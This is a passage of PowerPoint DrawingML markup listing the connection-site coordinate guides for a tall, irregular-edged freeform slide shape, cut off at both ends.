              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 263062 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 460893 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 434521 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 3945686 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 505401 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 463335 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 448810 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 270395 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 460893 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 434521 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 3945686 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 505401 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 463335 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 448810 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 62772 w 1349253"/>
